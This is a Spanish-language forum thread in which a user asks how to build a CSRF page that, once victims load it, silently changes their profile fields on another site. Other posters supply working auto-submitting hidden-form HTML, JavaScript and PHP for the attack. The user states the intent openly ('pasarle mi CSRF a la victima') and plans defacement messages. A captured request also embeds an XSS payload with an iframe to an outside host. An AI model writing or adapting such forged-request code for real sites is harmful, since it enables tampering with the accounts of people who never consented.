Foro de elhacker.net

Programación => Desarrollo Web => Mensaje iniciado por: xGaLan en 28 Noviembre 2014, 17:04 pm


Título: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: xGaLan en 28 Noviembre 2014, 17:04 pm
Bueno, quiero hacer que cuando entren a mi página web les haga lo siguiente, en método post se le cambie lo siguiente de la cuenta.

Código:
<form action="formulario" action="URL" 
Aqui quiero que se envie la solicitud de abajo.
<script>document.submit();</script>

Tengo la siguiente solicitud pero no sé ponerla:

Código:
altura=164&peso=60&color_ojos=Verdes&color_pelo=Marron&peinado=Corto&bello=Afeitado&tipo_cabeza=Cuadrado&complexion=Atletico&estado_animo=Inquieto&tipo_rol=Rol+serio%2C+nada+de+Off+Rol&estado_rol=En+Rol%2C+buscando+contacto&procedencia=Estados+Unidos.&apodo=Claight.&nick=ASDA&descripcion_fisica=%3CA+HREF%3D%22.%22%3EXSS+TEST%3C%2FA%3E%0D%0A%3C%2Fpre%3E%0D%0A%3Cpre%3E%0D%0A%3Ciframe+src%3D%22http%3A%2F%2FWww.xD.com%2F%3FComando%22%3E&descripcion_psicologica=Pr%C3%B3ximamente.&historia_conocida=Pr%C3%B3ximamente.&llegadaLS=Pr%C3%B3ximamente.&submit=Actualizar

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: engel lex en 28 Noviembre 2014, 17:13 pm
No entendi para nada, ni como esto es un csrf.... explicate con detalle lo que quieres

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: xGaLan en 28 Noviembre 2014, 17:17 pm
Lo que quiero es que cuando uno entre a mi index.php, les envie una petición a la PCU de un servidor, allí le edite todos los campos sin que el se de cuenta.

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: MinusFour en 28 Noviembre 2014, 17:29 pm
Código
  1. <form name="form1" action="URL" method="GET">
  2. <input type="hidden" name="altura" value="164">
  3. <input type="hidden" name="color_ojos" value="Verdes">
  4. <!-- Aqui sigues agregando valores -->
  5. </form>
  6. <script>document.forms.namedItem("form1").submit();</script>

Depende si el method es GET o POST. Hay formas para bloquear el CSRF.

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: xGaLan en 28 Noviembre 2014, 17:36 pm
Agradezco tú ayuda, ahora una última pregunta, ¿cómo hago que automáticamente le pulse a un botón de la página y aparte que se haga sin que se abra una pestaña nueva?

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: MinusFour en 28 Noviembre 2014, 17:45 pm
Cita de: xGaLan en 28 Noviembre 2014, 17:36 pm
Agradezco tú ayuda, ahora una última pregunta, ¿cómo hago que automáticamente le pulse a un botón de la página y aparte que se haga sin que se abra una pestaña nueva?

Para pulsar un boton, creo que puedes simplemente llamar a la funcion.
Código
  1. document.getElementById('id').onclick();

El comportamiento de las ventanas puede ser diferente para algunos navegadores. ¿Depende como tienes puesto que se abra la pestaña desde el boton?

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: xGaLan en 28 Noviembre 2014, 17:49 pm
Ahora tengo esto, el problema está en que yo quiero pasarle mi CSRF a la victima, entonces esta entra y se le abre la PCU en una nueva pestaña, tampoco se editan los campos en la nueva pestaña, quería que todo estuviese oculto.

Código:
<form name="form1" action="http://URL/opciones/editar_personaje" method="POST">
<input type="hidden" name="llegadaLS" value="X es el más fuerte">
<input type="hidden" name="descripcion_psicologica" value="X te ha hackeado bitch.">
document.getElementById('submit').onclick();
</form>
<script>document.forms.namedItem("form1").submit();</script>

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: MinusFour en 28 Noviembre 2014, 17:52 pm
Cita de: xGaLan en 28 Noviembre 2014, 17:49 pm
Ahora tengo esto, el problema está en que yo quiero pasarle mi CSRF a la victima, entonces esta entra y se le abre la PCU en una nueva pestaña, tampoco se editan los campos en la nueva pestaña, quería que todo estuviese oculto.

Código:
<form name="form1" action="http://URL/opciones/editar_personaje" method="POST">
<input type="hidden" name="llegadaLS" value="X es el más fuerte">
<input type="hidden" name="descripcion_psicologica" value="X te ha hackeado bitch.">
document.getElementById('submit').onclick();
</form>
<script>document.forms.namedItem("form1").submit();</script>

No puedes abrir una pestaña y ocultarsela :/, esa no es la base de CSRF.

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: xGaLan en 28 Noviembre 2014, 18:05 pm
Ahora he puesto esto pero no edita nada, se queda la página en blanco.

Código:
<?php

$url = "URL/opciones/editar_personaje";
$form["descripcion_fisica"] = "X HACKER";
$form["submit"] = "Actualizar";

echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'" method="POST">';
foreach($form As $key=>$value) {
        echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: T. Collins en 28 Noviembre 2014, 18:25 pm
Código
  1. <body onload="document.forms[0].submit()">

Con un CSRF no puedes "clickar" con javascript el botón de la otra página. En todo caso tienes que hacer la misma petición que hace al pulsar dicho botón.

Título: Re: ¿Cómo pongo la siguiente solicitud para CSRF?
Publicado por: engel lex en 28 Noviembre 2014, 20:48 pm
Esto no es un csrf... es un html normal y corriente...

Esto es desarrollo web
usa etiquetas GeSHi al publicar código

Movido a desarrollo web


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines